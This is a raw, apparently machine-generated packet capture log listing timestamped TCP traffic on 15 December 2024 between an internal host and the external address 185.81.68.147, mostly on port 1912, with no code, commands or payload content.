                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884813070 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.885103941 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.885715008 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.885775089 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.004921913 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.004968882 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.004981995 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.004995108 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005023003 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005037069 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005048037 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005059004 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005074024 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005089998 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005178928 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005178928 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005587101 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005661964 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125190973 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125231981 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125266075 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125298023 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125299931 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125329971 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125355005 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125356913 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125375032 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125386953 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125411034 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125416040 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125444889 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125448942 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125490904 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125500917 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125530958 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125560045 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125565052 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125586987 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125608921 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245539904 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245575905 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245606899 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245635986 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245636940 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245696068 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245707035 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245726109 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245754004 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245780945 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245788097 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245809078 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245820999 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245853901 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245863914 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245893955 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245913029 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245920897 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245937109 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.245971918 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.365814924 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.365852118 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.365885019 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.365888119 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.365915060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.365942955 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.365943909 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.365973949 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.365993023 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366000891 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366031885 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366058111 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366082907 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366087914 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366118908 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366147041 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366173983 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366194010 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366221905 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366250038 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366254091 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366270065 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.366312981 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486135006 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486155033 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486169100 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486186981 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486212015 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486243010 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486259937 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486299992 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486337900 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486367941 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486388922 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486421108 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486428976 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486449957 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486475945 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486486912 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486496925 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486526966 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486561060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486593962 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.486617088 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606158972 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606275082 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606292009 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606374025 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606499910 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606535912 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606568098 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606591940 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606626034 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606678009 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606678009 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606693029 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606745005 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606762886 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606796980 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606817961 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606849909 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606870890 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606919050 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606946945 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606976986 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.606996059 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.607012987 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.607084990 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726176023 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726295948 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726331949 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726387024 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726387024 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726515055 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726694107 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726744890 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726762056 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726782084 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726826906 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726855993 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726886034 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726937056 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726941109 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.726964951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.727024078 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.727075100 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.727104902 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.727154970 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846220970 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846357107 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846385002 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846412897 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846451998 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846458912 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846460104 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846563101 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846755028 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.846976042 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847004890 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847043991 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847057104 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847071886 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847088099 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847120047 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847126007 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847188950 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847203970 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847233057 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847259998 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847299099 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847348928 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.905262947 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.905309916 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.905756950 CET4974480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.906791925 CET4974480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966408968 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966485023 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966538906 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966568947 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966597080 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966631889 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966631889 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966758013 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966861963 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967221975 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967250109 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967282057 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967338085 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967401028 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967431068 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967500925 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967533112 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967598915 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967628956 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967696905 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967698097 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967698097 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.968612909 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.026492119 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.039830923 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086536884 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086631060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086673021 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086750984 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086790085 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086829901 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086827993 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086827993 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086896896 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087177038 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087362051 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087403059 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087420940 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087449074 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087466955 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087507963 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087512970 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087590933 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087641954 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087655067 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087696075 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087744951 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.088370085 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.089499950 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.159601927 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.159836054 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.160307884 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206577063 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206645012 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206691027 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206722021 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206773043 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206819057 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206864119 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206872940 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206913948 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206926107 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206980944 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207252979 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207496881 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207537889 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207559109 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207582951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207587004 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207627058 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207650900 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207693100 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207703114 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207741022 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207755089 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207796097 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207802057 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207843065 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.209327936 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.210572958 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.279987097 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.280922890 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326729059 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326797009 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326806068 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326862097 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326874018 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326915026 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326924086 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326965094 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326998949 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327039957 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327047110 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327084064 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327088118 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327143908 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327569962 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327610970 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327620983 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327660084 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327670097 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327711105 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327727079 CET191249709185.81.68.147192.168.2.5
